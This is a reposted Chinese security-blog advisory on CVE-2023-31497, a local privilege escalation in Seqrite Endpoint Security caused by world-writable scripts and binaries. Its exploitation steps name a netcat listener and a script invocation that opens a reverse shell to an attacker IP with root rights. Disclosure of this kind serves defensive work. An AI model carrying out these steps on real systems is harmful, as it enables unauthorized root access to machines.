|
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
漏洞简介
该漏洞的 CVE ID 为 CVE-2023-31497,已在所有基于 Debian 和 Ubuntu 的变体操作系统上进行了测试。
供应商和产品详细信息
卖方: Quick Heal Technologies Limited
产品:Seqrite 端点安全(EPS)
产品主页:https: //www.seqrite.com/endpoint-security/seqrite-endpoint-security
受影响的版本:影响 v8.0 之前的所有版本。
漏洞详情
该漏洞利用软件引入的 2 个不同漏洞来提升系统权限。首先,应用程序使用脚本来/etc/init.d/启动其扫描过程,任何用户都可以写入该脚本。其次,应用程序使用共享对象在运行时动态加载位置无关代码 (PIC)。事实上,所有可执行的共享目标文件都是全局可写的。最后,用于守护进程的应用程序二进制文件是世界可写的,这基本上意味着任何非特权用户都可以使用反向 shell 二进制文件覆盖扫描程序二进制文件以执行任意代码,如root.
漏洞利用
在攻击者机器上,使用netcat(nc -lvp <port>)或metasploit(multi/handler)启动监听器。
epscalate.py将和文件复制/下载shellcode.c到目标系统上。
使用适当的参数( )运行python文件python3 epscalate.py -H 192.168.0.103:9999 -I。
等待AV重新加载/系统重新启动。
与您的侦听器的反向连接可以确认代码以root身份执行。
下载地址
点击下方名片进入公众号
回复关键字【31497】获取下载链接
关 注 有 礼

推 荐 阅 读
原文始发于微信公众号(潇湘信安):CVE-2023-31497!Seqrite Endpoint Security端点安全 (EPS) 提权漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论